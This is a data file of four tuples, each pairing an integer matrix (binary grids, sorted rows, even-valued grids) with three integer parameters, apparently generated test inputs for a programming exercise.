([[0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1], [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1], [1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1], [1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1], [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1], [1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0], [0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0], [1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0], [1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1], [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1], [1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1], [1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0], [0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0], [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1], [1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0], [1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0], [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0], [0, 
1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1], [0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0]],14,25,17,),
([[2, 3, 4, 9, 11, 11, 11, 12, 15, 15, 19, 20, 20, 23, 24, 25, 29, 29, 29, 33, 34, 38, 41, 41, 44, 46, 48, 54, 54, 58, 60, 61, 62, 62, 62, 68, 68, 72, 73, 79, 79, 80, 83, 86, 92, 99, 99], [3, 3, 4, 4, 4, 6, 12, 16, 17, 17, 18, 18, 18, 19, 19, 21, 25, 28, 29, 30, 30, 32, 35, 38, 39, 42, 50, 53, 61, 65, 65, 65, 70, 71, 75, 80, 81, 84, 84, 89, 92, 92, 95, 95, 96, 98, 99], [2, 4, 7, 9, 10, 14, 17, 21, 22, 23, 24, 28, 29, 31, 31, 33, 33, 37, 37, 38, 39, 41, 42, 42, 45, 48, 48, 58, 60, 62, 63, 66, 73, 73, 75, 76, 76, 80, 83, 85, 86, 86, 91, 94, 99, 99, 99], [1, 1, 3, 6, 6, 6, 8, 12, 16, 17, 18, 24, 25, 27, 30, 33, 35, 39, 39, 41, 45, 48, 50, 50, 53, 53, 53, 55, 56, 57, 58, 60, 64, 69, 71, 73, 73, 74, 76, 78, 82, 84, 85, 93, 94, 98, 99], [1, 1, 4, 7, 9, 9, 14, 14, 16, 16, 19, 24, 24, 25, 25, 27, 28, 28, 30, 32, 34, 34, 36, 37, 38, 39, 41, 41, 45, 47, 54, 56, 57, 63, 66, 67, 71, 72, 79, 82, 83, 83, 83, 91, 92, 97, 97], [5, 8, 8, 9, 9, 14, 15, 18, 18, 22, 22, 24, 25, 25, 28, 28, 29, 29, 36, 38, 50, 56, 62, 63, 69, 69, 69, 70, 70, 70, 70, 74, 76, 80, 80, 84, 85, 87, 89, 89, 89, 89, 96, 97, 97, 98, 98], [1, 3, 6, 6, 8, 9, 10, 11, 14, 16, 20, 21, 21, 26, 27, 27, 29, 30, 37, 37, 38, 43, 43, 47, 47, 47, 48, 50, 51, 52, 53, 59, 59, 60, 61, 65, 65, 67, 71, 71, 78, 83, 87, 88, 88, 90, 99], [1, 1, 3, 6, 7, 8, 8, 13, 13, 14, 14, 17, 17, 18, 20, 25, 28, 29, 29, 30, 31, 33, 34, 38, 40, 43, 49, 50, 53, 56, 61, 62, 63, 64, 69, 70, 75, 81, 85, 88, 90, 91, 93, 93, 94, 95, 97], [1, 4, 5, 6, 6, 6, 6, 7, 10, 13, 13, 16, 21, 25, 26, 27, 32, 32, 33, 37, 37, 40, 43, 45, 47, 50, 51, 52, 53, 56, 58, 60, 61, 61, 67, 70, 75, 78, 82, 83, 85, 85, 86, 90, 92, 94, 94], [3, 5, 5, 5, 10, 10, 12, 14, 15, 16, 19, 20, 27, 29, 30, 32, 39, 40, 40, 40, 46, 49, 50, 53, 56, 58, 59, 59, 59, 59, 61, 65, 68, 76, 80, 83, 83, 85, 86, 87, 88, 89, 89, 89, 91, 93, 95], [2, 2, 7, 10, 10, 11, 11, 12, 15, 18, 21, 23, 24, 26, 27, 30, 32, 33, 33, 34, 35, 35, 35, 36, 38, 39, 40, 41, 41, 43, 43, 45, 50, 51, 56, 60, 62, 73, 74, 
76, 76, 79, 87, 89, 89, 90, 99], [2, 3, 8, 10, 10, 15, 15, 15, 22, 22, 25, 26, 28, 28, 29, 32, 34, 36, 36, 37, 39, 39, 40, 41, 44, 46, 47, 54, 55, 58, 67, 69, 69, 70, 70, 71, 72, 84, 84, 85, 89, 91, 93, 96, 96, 97, 98], [2, 5, 6, 6, 12, 12, 17, 18, 19, 19, 21, 22, 27, 37, 37, 38, 40, 41, 50, 53, 54, 57, 58, 61, 62, 63, 64, 70, 71, 72, 72, 72, 77, 77, 79, 80, 84, 88, 90, 91, 93, 97, 97, 98, 98, 99, 99], [1, 1, 2, 5, 9, 12, 14, 18, 18, 18, 19, 20, 21, 26, 27, 36, 37, 40, 41, 43, 46, 46, 47, 48, 51, 51, 53, 54, 59, 63, 67, 67, 68, 69, 74, 74, 74, 77, 80, 81, 83, 83, 83, 86, 90, 92, 99], [4, 4, 9, 9, 9, 9, 11, 11, 12, 12, 18, 18, 19, 25, 26, 26, 27, 27, 30, 33, 33, 35, 42, 42, 43, 45, 47, 47, 50, 51, 52, 55, 57, 61, 67, 70, 70, 70, 72, 73, 77, 78, 81, 82, 84, 91, 96], [2, 3, 5, 5, 5, 8, 11, 12, 12, 13, 17, 23, 27, 28, 30, 33, 34, 35, 36, 40, 40, 42, 42, 42, 45, 47, 51, 51, 52, 52, 64, 65, 71, 72, 76, 80, 80, 85, 87, 87, 88, 93, 94, 96, 97, 97, 98], [4, 12, 13, 15, 16, 17, 19, 20, 23, 23, 25, 32, 34, 34, 35, 37, 37, 40, 40, 41, 48, 53, 54, 59, 59, 61, 62, 63, 65, 65, 67, 71, 72, 74, 79, 79, 81, 82, 83, 84, 85, 87, 87, 91, 92, 93, 98], [3, 5, 9, 10, 14, 15, 19, 21, 24, 26, 30, 33, 37, 39, 44, 46, 46, 47, 53, 53, 54, 55, 56, 56, 57, 58, 66, 71, 72, 72, 73, 74, 76, 77, 80, 81, 83, 85, 88, 91, 92, 95, 96, 97, 97, 97, 98], [2, 8, 8, 8, 9, 11, 12, 17, 25, 25, 26, 26, 27, 33, 38, 39, 39, 41, 41, 44, 44, 45, 46, 46, 48, 50, 51, 53, 57, 61, 65, 67, 69, 77, 77, 79, 81, 82, 83, 84, 85, 88, 90, 91, 96, 97, 97], [2, 5, 7, 13, 15, 16, 21, 33, 34, 36, 37, 39, 40, 43, 45, 46, 47, 51, 51, 54, 55, 59, 62, 69, 70, 71, 71, 71, 72, 74, 75, 75, 76, 78, 78, 80, 81, 82, 82, 83, 84, 87, 88, 88, 91, 97, 98], [3, 4, 7, 9, 10, 10, 10, 11, 14, 15, 15, 16, 17, 18, 19, 22, 26, 27, 30, 40, 42, 43, 44, 46, 47, 48, 52, 54, 57, 59, 63, 64, 65, 66, 69, 72, 73, 73, 78, 78, 79, 81, 86, 87, 90, 91, 92], [2, 4, 10, 10, 12, 14, 19, 21, 23, 24, 28, 30, 32, 35, 38, 38, 39, 40, 42, 44, 45, 49, 55, 55, 55, 56, 57, 
61, 66, 70, 71, 74, 78, 80, 80, 81, 81, 82, 82, 82, 83, 84, 84, 85, 90, 93, 94], [3, 8, 9, 13, 14, 14, 18, 18, 22, 24, 24, 25, 29, 29, 35, 36, 36, 37, 38, 39, 40, 43, 44, 44, 46, 55, 57, 61, 62, 63, 67, 67, 69, 72, 72, 74, 74, 79, 79, 84, 85, 87, 88, 89, 92, 96, 97], [1, 1, 9, 10, 10, 16, 17, 20, 29, 30, 32, 35, 36, 37, 40, 41, 41, 42, 43, 43, 46, 53, 54, 58, 58, 59, 60, 60, 60, 67, 68, 69, 71, 73, 76, 80, 80, 82, 85, 85, 85, 89, 95, 96, 96, 97, 97], [1, 5, 6, 7, 9, 13, 14, 18, 20, 21, 26, 27, 31, 31, 34, 37, 39, 43, 45, 45, 45, 48, 51, 52, 54, 58, 61, 62, 64, 65, 69, 70, 70, 73, 75, 76, 80, 82, 83, 87, 88, 90, 90, 90, 93, 94, 96], [3, 5, 15, 15, 15, 16, 19, 20, 25, 26, 27, 30, 31, 31, 33, 34, 35, 37, 37, 49, 52, 55, 56, 59, 59, 62, 63, 63, 69, 70, 71, 72, 73, 76, 77, 78, 80, 81, 83, 86, 88, 90, 91, 92, 93, 94, 96], [3, 4, 6, 7, 8, 19, 19, 22, 24, 24, 28, 28, 33, 35, 38, 39, 42, 47, 47, 47, 48, 49, 50, 52, 53, 55, 57, 59, 60, 67, 70, 79, 79, 80, 80, 81, 83, 84, 85, 86, 88, 88, 89, 93, 94, 95, 96], [2, 3, 3, 5, 6, 7, 9, 9, 11, 13, 14, 16, 16, 17, 21, 23, 25, 28, 29, 33, 34, 37, 39, 42, 43, 50, 52, 56, 56, 56, 57, 58, 62, 69, 71, 74, 76, 76, 79, 82, 85, 85, 90, 94, 94, 95, 97], [9, 11, 23, 26, 27, 28, 30, 30, 32, 33, 33, 33, 34, 36, 37, 45, 46, 46, 46, 46, 46, 49, 51, 51, 52, 56, 61, 61, 62, 63, 64, 66, 67, 70, 76, 76, 80, 85, 86, 91, 91, 92, 93, 94, 97, 98, 99], [2, 3, 3, 4, 6, 6, 10, 11, 12, 15, 17, 18, 18, 18, 19, 20, 22, 24, 24, 28, 31, 32, 33, 35, 35, 36, 39, 40, 44, 50, 55, 59, 61, 65, 66, 67, 70, 72, 74, 78, 78, 82, 83, 91, 92, 94, 97], [1, 3, 7, 11, 13, 13, 16, 19, 19, 21, 22, 24, 26, 29, 29, 30, 30, 41, 43, 44, 47, 52, 58, 59, 59, 60, 60, 60, 66, 67, 68, 70, 73, 77, 79, 85, 85, 86, 87, 88, 90, 91, 93, 95, 97, 98, 99], [1, 1, 3, 4, 4, 4, 6, 7, 8, 8, 11, 11, 12, 13, 18, 21, 23, 23, 23, 25, 25, 26, 27, 40, 40, 48, 49, 53, 56, 58, 59, 60, 62, 62, 64, 66, 69, 80, 82, 84, 88, 88, 90, 91, 93, 97, 98], [4, 4, 5, 6, 8, 9, 12, 14, 16, 19, 24, 29, 30, 35, 36, 36, 38, 
40, 41, 42, 42, 45, 54, 58, 59, 60, 62, 65, 65, 66, 68, 69, 71, 76, 78, 80, 81, 82, 83, 87, 87, 88, 89, 90, 93, 94, 98], [1, 2, 4, 5, 5, 6, 7, 10, 17, 19, 21, 26, 30, 32, 33, 33, 34, 37, 40, 43, 44, 47, 48, 48, 54, 56, 56, 56, 57, 62, 64, 65, 67, 69, 76, 78, 80, 82, 83, 84, 86, 90, 93, 93, 93, 94, 99], [3, 4, 7, 7, 13, 15, 17, 18, 22, 24, 25, 25, 26, 27, 28, 33, 35, 36, 41, 45, 47, 47, 50, 52, 53, 54, 57, 57, 59, 62, 65, 73, 73, 75, 75, 76, 77, 78, 78, 79, 79, 79, 81, 82, 83, 90, 99], [3, 6, 12, 15, 17, 17, 22, 22, 22, 23, 26, 27, 27, 31, 34, 35, 46, 52, 54, 55, 56, 58, 61, 61, 62, 63, 64, 65, 65, 71, 72, 73, 77, 79, 79, 81, 81, 82, 87, 89, 91, 91, 94, 95, 96, 97, 97], [2, 4, 8, 12, 13, 15, 16, 18, 22, 22, 23, 24, 24, 26, 26, 26, 31, 32, 33, 35, 37, 38, 38, 38, 49, 49, 51, 53, 54, 55, 57, 64, 64, 67, 74, 75, 79, 80, 83, 84, 84, 85, 86, 87, 88, 92, 99], [2, 4, 4, 4, 5, 13, 15, 17, 18, 21, 21, 22, 23, 24, 28, 28, 30, 31, 34, 35, 35, 36, 41, 44, 44, 46, 47, 58, 59, 62, 63, 64, 66, 67, 67, 69, 70, 74, 81, 82, 84, 87, 89, 91, 92, 94, 97], [3, 3, 4, 6, 8, 10, 13, 13, 16, 16, 16, 16, 21, 30, 32, 32, 33, 33, 35, 40, 44, 45, 46, 46, 47, 47, 51, 62, 63, 65, 66, 70, 74, 75, 76, 78, 81, 82, 84, 85, 87, 87, 89, 90, 99, 99, 99], [2, 4, 5, 6, 6, 8, 9, 14, 15, 16, 18, 18, 18, 19, 19, 21, 23, 23, 23, 27, 27, 28, 29, 31, 37, 38, 38, 39, 40, 42, 47, 51, 54, 61, 70, 76, 79, 82, 83, 90, 90, 91, 92, 93, 95, 96, 97], [3, 3, 4, 7, 8, 8, 9, 10, 11, 14, 16, 19, 20, 21, 21, 29, 31, 37, 38, 40, 47, 50, 52, 53, 53, 54, 57, 59, 64, 65, 67, 67, 68, 73, 75, 82, 83, 84, 85, 87, 88, 91, 92, 92, 92, 94, 95], [4, 4, 4, 6, 9, 14, 15, 16, 17, 19, 25, 29, 29, 31, 33, 33, 34, 38, 38, 42, 42, 42, 43, 44, 46, 47, 52, 52, 53, 54, 61, 61, 63, 66, 68, 69, 71, 73, 75, 80, 86, 91, 92, 93, 96, 98, 99], [2, 2, 8, 8, 9, 10, 10, 12, 13, 15, 15, 22, 24, 25, 26, 30, 35, 38, 38, 40, 40, 42, 52, 54, 57, 58, 60, 63, 63, 63, 64, 64, 66, 70, 72, 72, 73, 77, 77, 80, 83, 87, 87, 88, 89, 90, 95], [3, 4, 4, 5, 6, 6, 8, 9, 12, 
14, 15, 16, 19, 22, 24, 25, 25, 27, 32, 35, 38, 38, 39, 40, 41, 42, 44, 47, 50, 52, 54, 54, 55, 58, 64, 69, 73, 74, 74, 78, 79, 86, 89, 90, 91, 92, 99], [2, 2, 2, 3, 6, 6, 11, 12, 13, 14, 15, 17, 17, 19, 22, 24, 29, 33, 36, 42, 45, 45, 45, 46, 48, 49, 51, 51, 52, 52, 65, 67, 67, 69, 70, 72, 80, 81, 81, 86, 89, 89, 91, 92, 93, 93, 97], [2, 6, 7, 13, 15, 22, 22, 27, 27, 28, 32, 36, 36, 36, 39, 41, 43, 44, 44, 45, 47, 48, 51, 53, 55, 56, 59, 60, 61, 61, 61, 64, 67, 69, 69, 69, 69, 70, 74, 80, 83, 84, 87, 91, 92, 95, 98], [6, 7, 7, 11, 11, 12, 12, 16, 16, 19, 19, 21, 26, 26, 28, 35, 36, 37, 41, 41, 42, 45, 54, 54, 63, 65, 67, 67, 69, 76, 77, 78, 81, 83, 83, 84, 85, 85, 88, 90, 90, 91, 93, 94, 96, 97, 98]],37,28,34,),
([[-18, -42, 20, -30, 0, 30, 22, -64, 2, 74, 54, 34, -22, -34, -22, -46, 46, 70, 74, -62, -84, -96, -34, -26], [40, -94, -42, -84, 8, -8, 40, 24, 62, -18, -42, 22, 50, -72, 0, 86, 20, 74, -66, -34, 2, 72, 68, -44], [-32, -82, -4, 98, 54, -46, 84, 16, 76, 68, 86, -58, 58, 58, -92, -90, -68, 16, 94, -84, 26, 68, -64, 86], [-64, 58, 6, -46, -84, -96, 14, 24, -96, -58, -36, -26, 30, -48, 4, -96, 18, 80, 60, 98, 72, -20, 0, -46], [-70, 58, 50, -70, 16, -18, 62, -84, 44, -98, 42, -2, 78, 78, 46, 60, 34, -16, 4, -52, -40, 16, -32, -82], [74, 54, 74, 14, 16, 28, -94, 42, -66, 40, 90, 84, -90, 28, -98, 26, -70, -2, -56, 88, 72, -44, 58, 36], [30, -48, -16, -54, -96, -46, 6, -28, -62, 76, 6, -14, 70, 2, -46, -14, -38, 72, -10, 60, -68, 92, 26, -2], [-80, -34, 18, 4, -56, -78, 18, -14, 20, 38, 38, 10, 8, 8, 44, 30, 18, -48, -64, 60, 28, -24, -76, 90], [-44, 12, 40, -40, -72, -74, -18, -86, -96, -24, 22, -80, 28, 62, 16, -28, -34, -86, -88, 66, 24, 30, 4, 54], [20, 44, -2, 0, 52, 52, -24, -88, 4, 6, -94, 96, -44, -68, -64, 34, -18, 44, 76, -16, 64, 36, -98, -88], [-58, -38, 6, -96, 2, -30, -94, -76, -82, -16, -36, -52, 0, -66, 52, -84, 4, 84, -32, -32, -16, -46, -24, -58], [-62, -18, 14, 56, 58, 68, -32, -46, -86, 58, -86, 36, -82, -98, 28, -8, 46, 76, -24, -38, -76, 74, 84, -86], [-38, 76, -48, -54, 80, 36, -86, -64, 68, -72, -70, 14, 14, -72, 46, -54, -98, -66, 36, 12, -74, 84, 76, 98], [62, -38, -70, 86, 40, 82, -70, -54, -90, -26, 86, 4, -66, 36, 22, 54, -30, 44, -36, 68, 2, -8, 78, -46], [-26, -26, -96, 16, -10, 98, -58, 30, -42, 26, 32, -74, 8, -74, 44, 46, -82, 94, 6, 0, -82, 32, 88, 0], [88, 54, -90, 82, -28, -96, 62, 64, 24, 72, 80, -30, -78, 62, -16, -48, -70, 78, 88, -30, 44, -40, -78, -14], [-74, -78, -46, -2, -2, 28, -8, 72, -44, 86, -26, -14, 84, 26, 72, 30, -4, 72, 92, 24, 98, 98, -80, 10], [-54, 68, 86, -14, 54, 86, -60, 40, 18, -32, 34, 22, 14, -36, 92, -42, 34, 86, -8, 60, -14, 6, -68, -16], [30, 82, -14, -60, 48, 30, 32, -42, 52, 48, 72, 30, -22, 16, -28, 
-92, -66, -90, -80, 86, 52, 92, -10, 20], [82, -78, -86, -80, -96, 60, -96, -14, 24, -42, 6, 66, 84, -16, -80, -38, 38, -90, -34, 16, 26, 82, -20, -42], [-36, -28, 86, 20, 88, -16, -40, 30, -26, 24, 18, -42, 68, -72, -42, -54, -86, -14, -86, -16, -58, 88, 94, 74], [62, -88, -18, -50, -36, -66, 74, 88, 54, -36, -70, 48, -68, 64, 70, 60, 28, 88, -60, 18, -70, -20, 70, 24], [-70, -16, -74, -6, 60, 8, 80, -72, -96, 62, -34, 8, 62, 48, -20, -92, -82, 60, 58, 80, 40, -34, 48, -40], [-48, 42, 64, -36, 28, -46, -68, 16, -42, 16, -34, 6, 78, 52, 38, -84, 90, 4, -94, -56, -30, -72, -36, -28]],16,18,22,),
([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],19,26,34,),
